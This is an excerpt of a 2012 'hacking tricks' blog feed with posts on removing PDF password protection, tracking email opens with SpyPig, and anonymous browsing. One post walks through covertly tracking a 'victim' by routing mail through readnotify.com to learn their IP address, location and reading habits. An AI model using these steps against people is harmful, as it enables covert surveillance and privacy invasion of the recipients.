&lt;b style="outline: none medium;"&gt;1&lt;/b&gt;. Removing password of a&amp;nbsp;&lt;span class="IL_AD" id="IL_AD1" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;PDF file&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;is so simple.Just open the tool to see a window as shown below.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="outline: none medium; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCZvYoI5LSkVzdWKwF2LUYRtBQJc5LXgf56ye3MgHO54aGrpKp9J2sCoBopUVOYBCae0Sypd5Cjs9jQVL5owamEwnaSFefGx8aLLNlrmr1DZEd2gS-ACLvuyQpCvY8vIviBKNKZfWFH5k/s1600/pdf+password+recovery.png" style="color: #0e0f0f; outline: none medium; text-decoration: none;"&gt;&lt;img border="0" height="476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCZvYoI5LSkVzdWKwF2LUYRtBQJc5LXgf56ye3MgHO54aGrpKp9J2sCoBopUVOYBCae0Sypd5Cjs9jQVL5owamEwnaSFefGx8aLLNlrmr1DZEd2gS-ACLvuyQpCvY8vIviBKNKZfWFH5k/s640/pdf+password+recovery.png" style="-webkit-box-reflect: below 0px -webkit-gradient(linear, 0% 0%, 0% 100%, from(transparent), color-stop(0.7, transparent), to(rgba(0, 0, 0, 0.0976563))); -webkit-transition: all 0.5s ease; margin: 0px; max-width: 100%; opacity: 1; outline: none medium; padding: 0px;" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;2&lt;/b&gt;. Just open the password protected&amp;nbsp;PDF file&amp;nbsp;and select where to save the file and click the convert button.The newly created&amp;nbsp;PDF file&amp;nbsp;will be password free and thats it...&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;NOTE:&amp;nbsp;&lt;/b&gt;The Password Remover tool will NOT work with&amp;nbsp;PDF files&amp;nbsp;that have a user password set.&lt;/div&gt;&lt;span style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIyJ10BfzN6MzwThLlwF32uKuCN0kFnMAvt9cm3tHQXHs0gUlXQfLdZj6jg9Az4_KggFkSqpgXOYA2r9VwKFkug9vhNBjw3_LLPCoNe1sgOuI7rOW_Adc4vKz-zGGNPxkRQu_SJm9qd_g/s72-c/pdf_logo.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Best Way To Track The Email Sent By You Using Spypig</title><link>http://latest-cracker.blogspot.com/2012/06/best-way-to-track-email-sent-by-you.html</link><category>hack Gmail</category><category>network hacking</category><category>Trace email</category><pubDate>Fri, 15 Jun 2012 17:10:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-1746049647561602821</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div dir="ltr" style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium;" trbidi="on"&gt;&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLD9TOEH7Xdl84GwfQwnpatUghVpzfTxFPCvaVOMW6dvTolsHeepSMWOB9iqFR5gm3nkbGY94HQUotwqKG30cLKFyXAVl53F3fs2luqGRwMysIUBvAkEXBf-8FS7KBuQ3iE-K7gbnQwRPg/s1600/images+(2).jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLD9TOEH7Xdl84GwfQwnpatUghVpzfTxFPCvaVOMW6dvTolsHeepSMWOB9iqFR5gm3nkbGY94HQUotwqKG30cLKFyXAVl53F3fs2luqGRwMysIUBvAkEXBf-8FS7KBuQ3iE-K7gbnQwRPg/s1600/images+(2).jpg" /&gt;&lt;/a&gt;Hi friends,this is my new article about email&amp;nbsp;&lt;span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;tracking&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;.I already posted&amp;nbsp;&lt;span class="IL_AD" id="IL_AD5" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;a advanced&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;method to hack&amp;nbsp;&lt;span class="IL_AD" id="IL_AD6" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;a persons&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;full details using email&amp;nbsp;tracking. If you are not aware of that read that article here&amp;nbsp;&lt;a href="http://www.realhackings.com/2011/05/track-and-get-details-of-anyone-just-by.html" style="color: #0e0f0f; outline: none medium; text-decoration: none;" target="_blank"&gt;HACKING USING EMAIL&lt;/a&gt;&amp;nbsp;This is an alternate way to keep track of your emails.You can details like&amp;nbsp;&lt;span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;exact time&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;your email is opened,IP address of the system where it is opened,&amp;nbsp;&lt;span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;geographical location&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;etc.All you want is to get a free account in&amp;nbsp;&lt;a href="http://www.spypig.com/" style="color: #0e0f0f; outline: none medium; text-decoration: none;" target="_blank"&gt;SPYPIG.&lt;/a&gt;These are the features that spypig provide&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;Recipient's Geographic Location&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
SpyPig can tell you where your recipient is located geographically when he/she opens your email. The accuracy is approximately 98% on the country level and 70% on the city level for&amp;nbsp;&lt;span class="IL_AD" id="IL_AD3" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;US cities&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;. The accuracy for non-US cities&amp;nbsp;varies. This database is updated constantly to improve or maintain accuracy. The location information is based on the recipient's computer IP address. Some&amp;nbsp;&lt;span class="IL_AD" id="IL_AD2" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; font-size: 17px !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;computer users&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;might hide their true IP address and use a different address to appear as if they're located in a different city or even country!&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;Group Emails&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
If you send out a group email with multiple recipients with a SpyPig in it, you will still be notified every time a recipient opens your email (up to the maximum number of the notifications you get, currently set to SPYPIG_MAX_NOTIFICATIONS_PER_TRACKED_EMAIL per tracked email), but you will not know which recipient. To track each recipient, send a seperate email message with a different SpyPig.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;Tips&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Many email applications disable automatic image download by default, especially for emails coming from strangers they've never seen before. So you'll probably have a better chance to get SpyPig to work with the recipients you've emailed back and forth before than with those you never have. That's because these known recipients' email applications might have already "learned" about your emails and put your email address into a less restrictive category. Many email applications enable automatic image download if the email's sender (you) is on the recipient's whitelist or safe senders list.&lt;br /&gt;
&lt;br /&gt;
In addition, avoid sending a very short message or gibberish in your email along with a SpyPig image as this may be mistakenly taken as a spam by your recipient's anti-spam software.&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;&lt;br style="outline: none medium;" /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;&lt;a href="http://latest-cracker.blogspot.in/2012/06/track-and-get-details-of-anyone-just-by.html" style="color: #0e0f0f; outline: none medium; text-decoration: none;" target="_blank"&gt;CLICK HERE TO KNOW MORE ABOUT EMAIL TRACKING&amp;nbsp;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;&lt;br style="outline: none medium;" /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;Make best use of it and dont forget to put your comments,if you find anything useful !!!!&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLD9TOEH7Xdl84GwfQwnpatUghVpzfTxFPCvaVOMW6dvTolsHeepSMWOB9iqFR5gm3nkbGY94HQUotwqKG30cLKFyXAVl53F3fs2luqGRwMysIUBvAkEXBf-8FS7KBuQ3iE-K7gbnQwRPg/s72-c/images+(2).jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Track And Get Details Of Anyone Just By Sending An Email</title><link>http://latest-cracker.blogspot.com/2012/06/track-and-get-details-of-anyone-just-by.html</link><category>hacking trick</category><category>ip address</category><category>network hacking</category><category>Trace email</category><category>tricks</category><pubDate>Fri, 15 Jun 2012 17:06:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-4742773072815202721</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="post-body entry-content" id="post-body-6491131260987164563" style="font-family: Philosopher, arial, serif; font-size: 17px; line-height: 22px; margin: 0px; outline: none medium; padding: 0px; text-shadow: rgb(255, 255, 255) 0px 1px 1px;"&gt;&lt;div dir="ltr" style="outline: none medium;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; outline: none medium; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8yu4u-oosFc7mSmQdzWFz7S34ZxPlONkUS8UwgmK2wRvKaTSu_u5-Z2scDXWWdGAXeCbBsqrGJjf9vkZnXVah4X65CR7zPpLap5r-gw6vfCddje5Evceu4i4F9jcF7DEb3wu1BnNbv1k/s1600/Email-Tracking.gif" imageanchor="1" style="clear: right; color: blue; float: right; margin-bottom: 1em; margin-left: 1em; outline: none medium;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8yu4u-oosFc7mSmQdzWFz7S34ZxPlONkUS8UwgmK2wRvKaTSu_u5-Z2scDXWWdGAXeCbBsqrGJjf9vkZnXVah4X65CR7zPpLap5r-gw6vfCddje5Evceu4i4F9jcF7DEb3wu1BnNbv1k/s1600/Email-Tracking.gif" style="-webkit-box-reflect: below 0px -webkit-gradient(linear, 0% 0%, 0% 100%, from(transparent), color-stop(0.7, transparent), to(rgba(0, 0, 0, 0.0976563))); -webkit-transition: all 0.5s ease; margin: 0px; max-width: 100%; opacity: 1; outline: none medium; padding: 0px;" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;Have your ever wondered to track anyone with a email id.Now its possible to track every details of a person with an email id.All you have&amp;nbsp;&lt;span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;to want&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;is the email id of the person who you want to track.Just follow these&lt;span class="IL_AD" id="IL_AD2" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;steps to&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;start&amp;nbsp;&lt;span class="IL_AD" id="IL_AD5" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;tracking&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;your victim&lt;br /&gt;
&lt;br /&gt;
first Go to&amp;nbsp;&lt;b style="outline: none medium;"&gt;www.readnotify.com&lt;/b&gt;&amp;nbsp;and&amp;nbsp;&lt;span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;create an account&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;there&lt;br /&gt;
&lt;br /&gt;
Once registered . . . send a mail to ur victim by the email id u registered at readnotify.com&lt;br /&gt;
&lt;br /&gt;
But before sending the mail just add ".readnotify.com" with the victims id.. for example&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;latestcracker@gmail.com.readnotify.com&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
and then send it...&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;What happens next?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Once you have sent a tracked email you can log in to your ReadNotify account to see the status of it. You will also receive a ReadNotification via email when your tracked email (or document) has been opened.&lt;br /&gt;
&lt;br /&gt;
ReadNotify will endeavour to provide the following in your&amp;nbsp;tracking&amp;nbsp;reports:&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;&lt;br style="outline: none medium;" /&gt;Complete delivery details&amp;nbsp;&lt;br style="outline: none medium;" /&gt;&lt;span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;Date and time&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;opened&amp;nbsp;&lt;br style="outline: none medium;" /&gt;Approximate geographic location of recipient&amp;nbsp;&lt;br style="outline: none medium;" /&gt;Map of location (available on paid subscriptions)&amp;nbsp;&lt;br style="outline: none medium;" /&gt;Recipients IP address&amp;nbsp;&lt;br style="outline: none medium;" /&gt;Referrer details (ie; if accessed via web email account etc)&amp;nbsp;&lt;br style="outline: none medium;" /&gt;URL clicks&amp;nbsp;&lt;br style="outline: none medium;" /&gt;How long the email was read for&amp;nbsp;&lt;br style="outline: none medium;" /&gt;&lt;span class="IL_AD" id="IL_AD6" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;How many&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;times your email was opened&amp;nbsp;&lt;br style="outline: none medium;" /&gt;If your email was opened on a different computer (such as forwarded)&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
There are lots of great features available to you - these include the following sending options:&lt;/div&gt;&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;Certified email&amp;nbsp;&lt;br style="outline: none medium;" /&gt;Ensured-Receipts and retractable emails&amp;nbsp;&lt;br style="outline: none medium;" /&gt;Invisible&amp;nbsp;tracking&amp;nbsp;&lt;br style="outline: none medium;" /&gt;Self-Destructing emails&amp;nbsp;&lt;br style="outline: none medium;" /&gt;Block printing&amp;nbsp;&lt;br style="outline: none medium;" /&gt;Adobe Acrobat&amp;nbsp;&lt;span class="IL_AD" id="IL_AD1" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;PDF Document&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;Tracking&amp;nbsp;&lt;br style="outline: none medium;" /&gt;Track MS Word or Excel documents&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="outline: none medium;"&gt;&lt;a href="http://latest-cracker.blogspot.in/2012/06/best-way-to-track-email-sent-by-you.html" style="color: blue; outline: none medium;" target="_blank"&gt;READ ANOTHER WAY OF TRACKING EMAIL&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
You can try all this for free and make a best use of it !!!!!&lt;/div&gt;&lt;/div&gt;&lt;div style="clear: both; outline: none medium;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="post-footer" style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium;"&gt;&lt;div class="post-footer-line post-footer-line-1" style="outline: none medium;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8yu4u-oosFc7mSmQdzWFz7S34ZxPlONkUS8UwgmK2wRvKaTSu_u5-Z2scDXWWdGAXeCbBsqrGJjf9vkZnXVah4X65CR7zPpLap5r-gw6vfCddje5Evceu4i4F9jcF7DEb3wu1BnNbv1k/s72-c/Email-Tracking.gif" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Anonymous Web Browsing Using Super Hide IP</title><link>http://latest-cracker.blogspot.com/2012/06/anonymous-web-browsing-using-super-hide.html</link><category>Hacking software</category><category>ip address</category><category>security</category><pubDate>Fri, 15 Jun 2012 17:02:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-3592507102296316531</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="post-body entry-content" id="post-body-7030122446418609555" style="font-family: Philosopher, arial, serif; font-size: 17px; line-height: 22px; margin: 0px; outline: none medium; padding: 0px; text-shadow: rgb(255, 255, 255) 0px 1px 1px;"&gt;&lt;div dir="ltr" style="outline: none medium;" trbidi="on"&gt;&lt;div dir="ltr" style="outline: none medium;" trbidi="on"&gt;&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcZ98M1vMxTxWGP42-mVFvJdS1i-50h-t5RVSD9b57cbHbmOfxj6QJxz9jAGgYojTsbI3mtvm23t0NvJSpTqxle9crkgR1z_EQwzBNBo0SHiaQI7FRqrSIxm3cHo2LF8GvfndUL6P_nP0/s1600/anonymous1.jpg" imageanchor="1" style="clear: right; color: blue; float: right; margin-bottom: 1em; margin-left: 1em; outline: none medium;"&gt;&lt;br class="Apple-interchange-newline" /&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcZ98M1vMxTxWGP42-mVFvJdS1i-50h-t5RVSD9b57cbHbmOfxj6QJxz9jAGgYojTsbI3mtvm23t0NvJSpTqxle9crkgR1z_EQwzBNBo0SHiaQI7FRqrSIxm3cHo2LF8GvfndUL6P_nP0/s200/anonymous1.jpg" style="-webkit-box-reflect: below 0px -webkit-gradient(linear, 0% 0%, 0% 100%, from(transparent), color-stop(0.7, transparent), to(rgba(0, 0, 0, 0.0976563))); -webkit-transition: all 0.5s ease; margin: 0px; max-width: 100%; opacity: 1; outline: none medium; padding: 0px;" /&gt;&lt;/a&gt;&lt;span class="IL_AD" id="IL_AD8" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;Anonymous browsing&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;is all we need to keep ourself secure and stay away from attacks.When you are using static IPs the chances of being attacked is very high.We have already discussed some techniques to&amp;nbsp;&lt;a href="http://www.realhackings.com/2011/09/how-to-find-ip-address-of-anyone-and.html" style="color: blue; outline: none medium;" target="_blank"&gt;Find IP of anyone and how to attack&lt;/a&gt;&amp;nbsp;.You can achieve secure browsing through many ways like using proxy servers and manually changing your ip regularly.But here we are using a simple trick to hide ourselves using a tool called Super Hide IP. - one of the best programs for the automatic change of ip address. The program will automatically work proxy server and designate it for use in your system. One feature of program - small size and very simple operation.&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;KEY FEATURES&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
